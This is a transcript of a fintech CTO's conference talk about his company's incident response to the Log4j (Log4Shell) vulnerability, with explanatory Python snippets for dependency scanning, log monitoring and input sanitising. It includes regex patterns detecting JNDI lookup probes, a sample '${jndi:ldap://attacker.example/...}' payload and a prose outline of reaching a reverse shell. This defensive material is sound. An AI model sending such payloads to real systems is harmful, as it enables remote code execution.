How We Battled the Log4j Zero Day Vulnerability at SurePay

Amsterdam 2023

In this presentation, SurePay's CTO, Friso Schutte, will delve into the world of the Log4j vulnerabilities, with a focus on the timeline of SurePay's experience. You will learn about the challenges the SurePay team faced and the steps they took to address the issue. Friso will also discuss the wider implications of the Log4j threat and what organisations can do to protect themselves in the future.

Presented by Sonatype.

Full transcript

The complete talk, organized by section.

Friso Schutte

So this talk is about the Log4j zero-day vulnerability and how we handled it. To give you some context, the first half will be about SurePay and how we deal with security in general, and then we dive into the specifics of the Log4j vulnerability. I guess you guys know what it is, but I will still explain a little bit and try to go into the technical details also.

This is the setup about SurePay. SurePay is a fintech, so the name already implies it, right? We provide a safe way for making payments. Our clients are banks and corporates who use our service for everything that is related to financial transactions. Then I will explain about how we have set up security. It is bank-grade security because our clients are those banks. That's really interesting. And then how we tackled the Log4j.

To give you a little bit of context on what SurePay does: this is research done last year in Germany. We asked everybody: when you make a credit transfer, does your bank verify the name you enter against the account holder of the IBAN? Guess what? Sixty-five percent of the people thought that this is the case, and 35% said, well, this is not the case, the only thing you need is the IBAN. I don't know what you guys think. It depends a bit on the country also.

Then we asked also, do you want the bank to verify the name? Almost everybody, 94%, said yes, we want the bank to verify the name, because otherwise when you make a payment to John Smith and the account number is maybe John Doe, then you're paying to the wrong person.

This is what we try to solve. In 2014, the rules of SEPA, the Single Euro Payments Area, said the single identifier for making a payment is the IBAN. Whatever you put in the name, it doesn't matter. If you put in, you know, X6X, then it will still go forward. The bank will not hold that payment back. This opens the door to misdirected payments, and this is exactly what we try to solve.

We made a solution. In the Netherlands, if you have a Dutch banking account, you will already know us. We are operating in the backend. This is a typical banking application. You make a payment. We will give you back whether the name corresponds to the account holder; that's the left one, the match; whether it's a close match; or whether it's a no match. The close match is necessary because of privacy rules. We cannot simply disclose information that the user doesn't know. The privacy rules in Europe make this a difficult problem to solve. We have to integrate with all the banks, and we cannot disclose information that is sensitive, of course.
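The three outcomes described above can be illustrated with a small sketch. This is not SurePay's matching logic, which the talk does not describe; the normalisation steps, the `difflib` similarity measure, the 0.8 threshold, and the label strings are all assumptions chosen only to show the shape of a match / close match / no match decision.

```python
import difflib
import unicodedata


def normalize(name: str) -> str:
    """Lowercase, strip accents, and collapse repeated whitespace."""
    decomposed = unicodedata.normalize("NFKD", name)
    without_accents = "".join(c for c in decomposed if not unicodedata.combining(c))
    return " ".join(without_accents.lower().split())


def check_name(entered: str, account_holder: str, close_threshold: float = 0.8) -> str:
    """Return 'match', 'close_match', or 'no_match' (hypothetical labels)."""
    a, b = normalize(entered), normalize(account_holder)
    if a == b:
        return "match"
    # Similarity in [0, 1]; the threshold is an illustrative assumption.
    similarity = difflib.SequenceMatcher(None, a, b).ratio()
    return "close_match" if similarity >= close_threshold else "no_match"
```

Note that the function only returns a label and never the account holder's name, which mirrors the privacy constraint mentioned above: the caller learns how well the entered name fits, not what the correct name is.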

That's in short what we do. Since the go-live in 2017, we have performed more than 4 billion checks already. About 83% result in a match, 12% in a close match, and 5% in a no match. The result is that there were 67% fewer misdirected payments and less invoice fraud. It's a positive business case. Of course, the operational overhead that comes with it is an important factor for the banks. They spend less money on the operations. For corporates, we also sell the product. They use it mostly for onboarding, and there are also fewer dropouts there. That's in short SurePay. That's what we try to solve. It's a niche product.

Of course you're interested in how we do this. I hope you're interested. This is a high-level architecture, really simplified of course, but it boils down to: on the right-hand side, the banks supply us with data. That can be either real time, so we call the bank, or it can be offline where they provide us with batches and store it in our data store. On the left-hand side, you see consumers, the consumers of our APIs. That can be a banking app or any financial organization, a booking application or something like that. We also provide a portal, and we can even do file-based checks. Just provide us a file and then we give it back. That's a really simple setup.

We also have some other sources. You can provide us with manual files, or we plug into the Chamber of Commerce, and then you can enrich the data and give a more sophisticated result back. That's really an obvious growth path. We plug into the police, for example, or sanction lists, those type of things, to mitigate fraud even better. We have lots of interesting banks, like the banks in the Netherlands, but also in the UK. We operate with NatWest and RBS and Virgin Money and those type of banks.

This is a different view of the architecture. We have an interface layer, business layer, and integration layer. I guess you can plug this architecture to any company, but the reason I showed this is that we also have cross-cutting concerns, layers like the user management and logging and monitoring, observability, and of course the security.

For security, we use things like intrusion detection with Alert Logic. Everything runs on AWS, so we use things like GuardDuty, CloudWatch, Security Hub, those type of things for the security layer. On the outer network layer, we use things like Route 53, AWS Shield, the usual AWS stack, if you are familiar with it.

That's on the technical side. We are a Java shop. We also use a lot of Kotlin and then Python, just because it's nicer, I think. It's more fun at least. In the development build cycle, we use things like Jenkins, SonarQube, GitHub, and of course Sonatype Nexus Lifecycle. Sonatype invited me here. Nexus Lifecycle is a product, I don't know if everybody knows it, but it scans and monitors your third-party libraries, so your open source libraries, to see if it's vulnerable or not. In light of Log4j, this is an important product.

This is just to give you some context. Even more important, I guess, is the way we deal with legal, compliance, and security. When I joined SurePay, my background was technical. I'm an architect. I used to be a developer. I thought everything was about technique, technology. But in our business, I think this is probably even more important: we have an extensive information security management system, ISMS. We are compliant with the ISO standard, ISO 27001, and a whole bunch of other certifications, like Cyber Essentials. We have lots of policies for acceptable use, for access control, secure development, et cetera. Super, super important.

When you work in a really big company, I guess it's less visible. If you work in a small company like SurePay, we are less than a hundred people, so everybody needs to be aware of this. It's very, very important.

I don't know if it's readable, but this used to be an animation. This is the PDF version. You're overwhelmed with lots of information. I will read some of these. These are questions we typically get from the due diligence in RFPs. A question like, describe the processes or technologies you have in place for secure coding. Also, please advise where all the bank data is stored, including subcontractors, data centers, local storage and backup tapes, media even. These are typical questions we get. Do you undertake pen testing, and how frequently do you do that? Who is the one that does it? Do you have a certified pen tester, for example? Please outline also the full suite of encryption standards available in the product, both at rest and in transit. All of these questions we need to answer. For this, we have the policies, and everybody needs to be aware. It's very annoying to answer those questions.

Usually we answer with something like this. That is our security approach. We have data security on the highest level. Data at rest is encrypted with AWS KMS. Also on the transport layer, of course we have TLS, but also things like whitelisting or OAuth for the APIs. On the application security level, we have code reviews, also the pen testing. We have automatic code analysis tools like SonarQube. On the infra level, everything is infrastructure as code, obviously with CloudFormation mostly. We also use some CDK. Then the security governance: that's all the policies I already talked about. Also, very importantly, we for example have to screen every employee, and we have to prove that every employee is educated when it comes to secure code. We have a tool that monitors, like a lab tool, SecureFlag. I don't know if people know it. I can really recommend it.

This is the last slide about SurePay. Now we dive into Log4j. I just wanted to tell you guys that we have everything in place. It's really as it's supposed to be. It's security by design from the bottom up. Security was a major requirement. The architecture and tooling: we use a lot of AWS, what I already said. The process is based on ISO 27001. The way of working in the development process, in the organization, like the screening. And we have independent audits. To get the certification, you need an independent audit, of course.

That's about SurePay. That's the context. Now the question is, does this all help when you have a zero-day vulnerability? Because then you get a zero-day vulnerability, which basically means you have to act fast. Zero-day vulnerability means that it's out in the open. Everybody can exploit the vulnerability. In this case, it was a very simple thing to exploit. I tried it myself. Within a few hours, I could reverse shell into another machine. It was almost mind-blowing that it was possible to do that.

For us, this is, again, a pity: it's not an animation. You have to read from the bottom to the top. My security engineer, a security officer, sent me a Slack message. This is a real Slack. I didn't edit it. He said, there's a major vulnerability that needs my attention today. We are vulnerable. If we are vulnerable, that may require an emergency update.

That's interesting. I always ask people, how long does it take you to go into production? A lot of people say, well, we have the change management policy, so you need to have QA, a lower environment, higher advisor. Before you know it, you're two weeks further. But with a zero-day vulnerability, you can't afford that. You have to go fast. I will need a few developers and a few DevOps in case we are involved, to further check. We created the task force, let's say a war room. I told him, let me know if you have more info.

Then he came with this article. This was in 2021, by the way, December 10th. I remember really well because it was a Christmas party at our office. When these things come, they always come together with some other things. Some people could not really enjoy Christmas so much. The article explains that in Minecraft, you could take over somebody else's machine. Really dangerous, but also interesting. I responded and told them, well, we don't even use Log4j, so we are safe, but I haven't scanned it thoroughly.

Then he said, good morning, guys. This is a message to a bunch of engineers: if you are in this group, you volunteered to have an adventure in a shitty day. The typo, I think, is because the guy was a bit nervous. You have to understand, he is Italian with a bit of temperament. Really good guy, by the way. But you will see throughout the Slack messages more and more typos coming in. I have the feeling he was shaking when he was typing this in.

One of the engineers replied and said, additional reporting from the security firm LunaSec said that Java versions greater than specific numbers were not vulnerable. They were not affected by this attack vector because you cannot load remote codebase using LDAP. He said, I don't think we are affected as we use newer versions of JDK. Then our security engineer said, we haven't investigated thoroughly, and not all the particularities are known. At that time, Twitter also exploded, lots of articles came out, and it was very confusing what it really was. For me also. I had to dive into the whole Log4j. Is it about Java? Is it Log4j? Are you safe when you use a particular version or not?

I looked into it and found out that it's a vulnerability in the Log4j library. This is a library that is used in Java a lot. But not only that: it had already been discovered before the Minecraft reports. Minecraft was on the 9th of December, but two weeks before that, it was already discovered and privately disclosed to the Apache Software Foundation, where the project is hosted. To make it even worse, it had already existed in the code for almost 10 years, since 2013. When you think about it, it's almost unreal. Sometimes it crossed my mind, well, maybe this was on purpose by some institutions or so. Anyway, it was there, and a lot of programs are vulnerable. If you consider that 60% of Java programs use it, it's really a serious threat. Akamai, one of the famous CDNs, estimated about 10 million attempts per hour to exploit this vulnerability in that month of December. Ten million per hour. So a lot.

What did Apache do? They patched it immediately, well, almost immediately. Once it was privately disclosed, they patched it on the 6th of December, but that was a soft patch. They just changed the default behavior, so you could still be vulnerable if you override the default behavior, for example. Then a week later another patch came, and a week later yet another patch. It was apparently difficult to fully patch it. By that time, it was called Log4Shell, because potentially you could start up a shell, and that's one of the most dangerous types of attack.

This is what my engineer said: another day, another vulnerability. Log4j. It started to feel a bit like COVID at that time. Every week there was also a new variation. You might say, well, if it was patched, then what's the problem? This is a screenshot from the Sonatype website. They have a special section on Log4j. If you're interested in it, it's an interesting website. You can see how often Log4j is downloaded because Sonatype has the Maven repositories. About 25% of the versions still being downloaded are vulnerable versions. It's impressive. A lot of those are of course transitive dependencies. It's not like people are purposefully downloading that vulnerable version, but it comes via another framework, for example. But it's just as dangerous, of course. In different geographic locations, the behavior is different. I saw that the Netherlands, you can hardly see it, but the Netherlands is not fully green there.

This is my security officer again. "Friso, we have a problem with the Jenkins." I told him, yes, I know a few, because Jenkins is not really well known for being super stable and friendly. I was asking, which one are you referring to? By the way, we were in an emergency call with NatWest, one of our big customers. They are demanding customers. We also had the Christmas party, so you can imagine everything comes on top of each other. The capacity is very limited.

An hour later, Jenkins was shut down by the security officer. I asked him, we cannot use Jenkins anymore? What's this? "Do you need it? We removed the load balancer. We found out that you could control it without authentication." Lots of typos here, but he found out that Jenkins was not set up properly. Afterwards it turned out to have nothing to do with Log4j, but I think this is one of the lessons learned. Once you have a zero-day vulnerability, you go over your whole landscape and you find a whole lot of garbage that you don't want to see, and you don't know if it has to do with Log4j at that point in time, yes or no. Of course, I asked him to start up Jenkins again, because it was not really a good moment to stop Jenkins at that time.

This is our approach. At first, we went over the whole of our landscape and verified: do we have Log4j in our stack, yes or no? It's not that easy to answer, to be honest. I thought it was easy. We have Nexus Lifecycle. We know for every repository which dependencies it has. But are we sure that every project is in Nexus Lifecycle? Do we know that each team properly followed up with the policies that we have? We were not 100% sure. So we ended up creating a script that goes crawling over the whole of the GitHub repositories to double, double, double check it, basically.
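A crawl like the one described above could look roughly like the following. This is a minimal sketch, not the script SurePay used: it assumes the repositories are already cloned side by side under one local directory, and it only looks for the string `log4j-core` in Maven and Gradle build files. The function name and the file list are illustrative.

```python
from pathlib import Path
from typing import Dict, List

# Build files to inspect (assumption: Maven and Gradle projects only).
BUILD_FILES = ("pom.xml", "build.gradle", "build.gradle.kts")
# log4j-core is the artifact that ships the JndiLookup class.
NEEDLE = "log4j-core"


def find_log4j_references(root: Path) -> Dict[str, List[str]]:
    """Map each repository directory under root to the build files mentioning log4j-core."""
    hits: Dict[str, List[str]] = {}
    for repo in sorted(p for p in root.iterdir() if p.is_dir()):
        for path in sorted(repo.rglob("*")):
            if path.name in BUILD_FILES and path.is_file():
                text = path.read_text(encoding="utf-8", errors="ignore")
                if NEEDLE in text:
                    hits.setdefault(repo.name, []).append(str(path.relative_to(repo)))
    return hits
```

A text search of this kind only finds declared dependencies. Transitive dependencies do not appear in the build file, so a real check would also need the resolved dependency tree from the build tool or a scan of the built artifacts.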

Also, you don't know about third-party products. We use, for example, Elastic. We use SonarQube. We use all kinds of databases. Do they use Log4j underneath, yes or no? Communication is also very important here.

Then we wanted to monitor the system, whether it was affected or not. You go over the logs, the HTTP logs. Do you see incoming traffic where somebody is trying to exploit it? Also, we tried to understand it and replay it. We have some really good engineers that can script their way around, try to replay it in our environment. We went over all the controls in production itself, and we created the Log4j war room. Very importantly, we communicated ourselves also, both internally but also externally, because lots of questions came in. We even got a compliment from one of our suppliers or one of our clients because we proactively informed them. Some of the vendors that we have, we were still asking them, so are you affected or not, and what are you doing against it or not? Communication is very, very important for this. Also, you can imagine that our business, the ones that are not in IT, they were messaging me continuously: what's happening? What's happening? So I needed to tell them something.
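Going over the HTTP logs for exploit attempts can be sketched as a simple pattern search. The example below is an assumption about what such a check might look like, not the tooling used at SurePay: it URL-decodes each line and flags a literal `${jndi:` as well as nested `${...${` expressions, which were a common way to disguise the string. The log format and the function name are made up for illustration.

```python
import re
from urllib.parse import unquote

# A plain JNDI lookup, case-insensitive.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A lookup nested inside another lookup, e.g. ${${lower:j}ndi:...}.
NESTED_PATTERN = re.compile(r"\$\{[^}]*\$\{")


def suspicious_lines(lines):
    """Yield (line_number, line) for log lines that look like Log4Shell probes."""
    for number, line in enumerate(lines, start=1):
        decoded = unquote(line)  # catch %24%7Bjndi... style encoding
        if JNDI_PATTERN.search(decoded) or NESTED_PATTERN.search(decoded):
            yield number, line.rstrip("\n")
```

A hit only shows that somebody tried. It says nothing about whether the attempt succeeded, and a regular expression like this will miss more creative obfuscation, so it complements rather than replaces checking which components actually contain the library.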

This is Sonatype Lifecycle. This is not from our production environment, because when I ran this myself, there were some things that I didn't want to show in this presentation. This is just a random screenshot from the internet. You can see this particular application uses a Struts version with security vulnerabilities; some of them are high, some of them are critical. Very handy tool, very important. Nowadays, the SBOM, the software bill of materials, is a trending topic because you need to know what exactly is in your software. You can look it up.

This is what I already explained. Are all the projects in this Lifecycle tool, yes or no? And what about the third-party products? This was on the Sunday, the Sunday after the Friday, and I asked people to join. Some of them were outside of the country, enjoying their weekend, but some of them were at home. I contacted them and said thanks for joining. So a small recap: we have scanned all our software. We are not using the Log4j library ourselves, which means that we are safe, but we need to go over the third-party components like Kibana, Elastic, and some other tools. Kibana and Elastic are very important because that's where we log our messages. We use it for our audit data. Everything that comes in, every request and response, we also store in Elastic, which is also necessary for compliance reasons. It all comes together there.

I need to go a bit faster, I see. It boils down to that we had a Zoom call on Sunday, and the guy said, well, I asked my boss and she said okay. I guess his wife.

Very quickly about how it works. Lookup is a feature in Log4j that has existed for a very long time, and it comes down to property substitution. In your log message, you can have a substitution of a property, for example the Java version, and it will print out the Java version. But it can also be an environment property, for example. So this is a very simple mechanism.
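The idea of property substitution can be shown with a toy model. This is not Log4j's implementation; it is a Python sketch that borrows the `${prefix:key}` shape of Log4j lookups such as `${java:version}` and `${env:NAME}`. The `py` prefix, the `LOOKUPS` table, and the `substitute` function are invented for the illustration.

```python
import os
import platform
import re

# Each prefix maps to a function that resolves a key to a string.
LOOKUPS = {
    "env": lambda key: os.environ.get(key, ""),
    "py": lambda key: platform.python_version() if key == "version" else "",
}

# Matches ${prefix:key} with no nesting (a deliberate simplification).
TOKEN = re.compile(r"\$\{(\w+):([^}]*)\}")


def substitute(message: str) -> str:
    """Replace every ${prefix:key} token whose prefix has a registered lookup."""
    def resolve(match):
        handler = LOOKUPS.get(match.group(1))
        # Unknown prefixes are left untouched.
        return handler(match.group(2)) if handler else match.group(0)
    return TOKEN.sub(resolve, message)
```

For example, `substitute("running on ${py:version}")` fills in the interpreter version. The point to notice is that substitution runs over the whole message text, so any part of the message that came from outside is interpreted in the same way as the part the developer wrote.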

There was a guy who asked for this extension to it. Well, this is nice, the property substitutions, but I also want to have JNDI lookups in it. It's an extension to the existing thing. That was already implemented in 2013. So just a random guy who asked, can you extend this property substitution lookups with a JNDI lookup? But JNDI lookup is very dangerous because that's a way to inject code into your system. Now you can do a JNDI lookup with LDAP, and then you can call remote codebase and you can inject it in your own system.

I will skip this one. This is a little bit how it works on a high level. You have a hacker and you have a vulnerable application. The hacker calls the system and puts this particular code, the JNDI lookup, in maybe the User-Agent header or so. If the application is vulnerable, it will fetch the class from LDAP. That can be a Java class, and in Java you can have static code. So even just loading the class can result in already running the code. You don't need to call a specific method. You can just run it. Then your evil code goes here. For example, you can start a netcat, and then you have a reverse shell. I tried it myself, and it really works. It's really dangerous.

Will it work in your situation? Now I come back to all the policies. It's not that easy to make it work. You need an open outbound network, for example. Do you have that? Well, I hope not. If you are in the core of your system, can you connect to any server in the outside world? Normally not. It also requires you to be able to even start a reverse shell. On my Mac, for example, it was not that trivial at all. Then again, there are always scripts on the internet that you can download, but it's difficult. If you stick to the least-privilege principle, then you're also kind of safe. It also requires an old version of Java, or you have to override the default settings. Finally, you have to log it in an unfiltered way. So what you receive, you have to log immediately. It's probably better to have it a bit filtered, maybe escape some weird characters or these type of things. And you need, of course, an old version of Log4j, because now it's patched there.
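The remark about filtering what you log can be made concrete with a small helper. This is a sketch of one possible filter, not a recommendation from the talk and not a substitute for upgrading the library: it assumes you want to replace control characters, break up `${` so it can no longer start a lookup, and cap the length. The function name and the 200-character limit are arbitrary choices.

```python
import re

# ASCII control characters, including CR and LF (prevents forged log lines).
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def sanitize_for_log(value: str, max_length: int = 200) -> str:
    """Neutralise untrusted input before it is written to a log."""
    cleaned = CONTROL_CHARS.sub(" ", value)
    # Insert a space so "${" can no longer open a lookup expression.
    cleaned = cleaned.replace("${", "$ {")
    return cleaned[:max_length]
```

Applied to a header value such as `${jndi:ldap://attacker.example/a}`, the helper returns `$ {jndi:ldap://attacker.example/a}`, which a substitution engine would treat as plain text. It is one layer among the ones listed above, next to closed outbound network access, least privilege, and a patched library.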

I'm running over time, but this is the last slide. One year after the attack, we can still see that a lot of firms are exposed. Recently I saw this article where Iranian hackers compromised a US federal agency's network using the Log4Shell exploit. So the message, I guess, is be careful. If you stick to your principles, then you will be safe. It's not that easy to exploit.

I think this was it because the next presentation will come quickly. I don't know if there's any room for questions. Is there somebody from the organization? Otherwise, maybe it's better if you just come up, reach me. I will be in the Sonatype booth a lot. Otherwise I will be walking around and you can contact me. Thank you.